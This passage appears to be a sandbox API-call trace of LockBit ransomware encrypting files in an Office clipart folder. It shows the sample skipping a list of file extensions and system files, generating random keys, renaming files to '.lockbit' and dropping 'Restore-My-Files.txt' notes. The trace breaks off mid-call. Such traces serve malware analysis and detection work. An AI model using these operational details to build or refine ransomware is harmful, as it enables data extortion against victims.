[0162.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.782] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.782] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.782] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.785] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01421_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01421_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.785] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.785] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.786] free (_Block=0x1fa2ed8) [0162.786] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01421_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.786] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.786] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.787] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b435600, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x6a370b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8b435600, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x4e82, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01468_.WMF", cAlternateFileName="")) returned 1 [0162.787] lstrcmpiW (lpString1=".", lpString2="NA01468_.WMF") returned -1 [0162.787] lstrcmpiW (lpString1="..", lpString2="NA01468_.WMF") returned -1 [0162.787] PathFindExtensionW (pszPath="NA01468_.WMF") returned=".WMF" [0162.787] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.787] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.788] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.788] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01468_.WMF") returned 1 [0162.789] lstrcmpiW (lpString1="ntldr", lpString2="NA01468_.WMF") returned 1 [0162.789] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01468_.WMF") returned 1 [0162.789] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01468_.WMF") returned -1 [0162.789] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01468_.WMF") returned -1 [0162.789] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01468_.WMF") returned 1 [0162.789] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01468_.WMF") returned -1 [0162.789] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.789] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01468_.WMF") returned=".WMF" [0162.789] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.789] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.789] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.790] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.790] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.790] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.790] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.790] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.790] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.790] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.790] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.790] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.790] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.790] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.790] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.790] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.790] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01468_.WMF.lockbit") returned 72 [0162.790] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01468_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01468_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0162.795] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.795] malloc (_Size=0x40068) returned 0x1ff1e60 [0162.795] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=20098) returned 1 [0162.795] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.795] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0162.795] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.796] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0162.796] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0162.800] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01468_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01468_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.800] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.800] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.801] free (_Block=0x1fa2ed8) [0162.801] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01468_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.801] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.801] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.801] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87afcf00, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x6a370b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x87afcf00, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x4ada, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01470_.WMF", cAlternateFileName="")) returned 1 [0162.801] lstrcmpiW (lpString1=".", lpString2="NA01470_.WMF") returned -1 [0162.801] lstrcmpiW (lpString1="..", lpString2="NA01470_.WMF") returned -1 [0162.801] PathFindExtensionW (pszPath="NA01470_.WMF") returned=".WMF" [0162.801] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.801] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.801] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.801] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.801] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.801] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.801] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.801] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.801] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.801] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.802] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.802] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01470_.WMF") returned 1 [0162.803] lstrcmpiW (lpString1="ntldr", lpString2="NA01470_.WMF") returned 1 [0162.803] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01470_.WMF") returned 1 [0162.803] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01470_.WMF") returned -1 [0162.803] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01470_.WMF") returned -1 [0162.803] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01470_.WMF") returned 1 [0162.803] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01470_.WMF") returned -1 [0162.803] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.803] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01470_.WMF") returned=".WMF" [0162.803] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.803] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.803] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.804] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.804] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01470_.WMF.lockbit") returned 72 [0162.804] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01470_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01470_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0162.805] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.805] malloc (_Size=0x40068) returned 0x3d70450 [0162.805] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=19162) returned 1 [0162.805] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.806] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0162.806] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.806] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0162.806] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0162.812] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01470_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01470_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.812] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.812] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.813] free (_Block=0x1fa2ed8) [0162.813] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01470_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.813] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.813] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.813] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x841c4800, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x594f87d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x841c4800, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x2028, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01472_.WMF", cAlternateFileName="")) returned 1 [0162.813] lstrcmpiW (lpString1=".", lpString2="NA01472_.WMF") returned -1 [0162.814] lstrcmpiW (lpString1="..", lpString2="NA01472_.WMF") returned -1 [0162.814] PathFindExtensionW (pszPath="NA01472_.WMF") returned=".WMF" [0162.814] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.814] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.815] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.815] lstrcmpiW 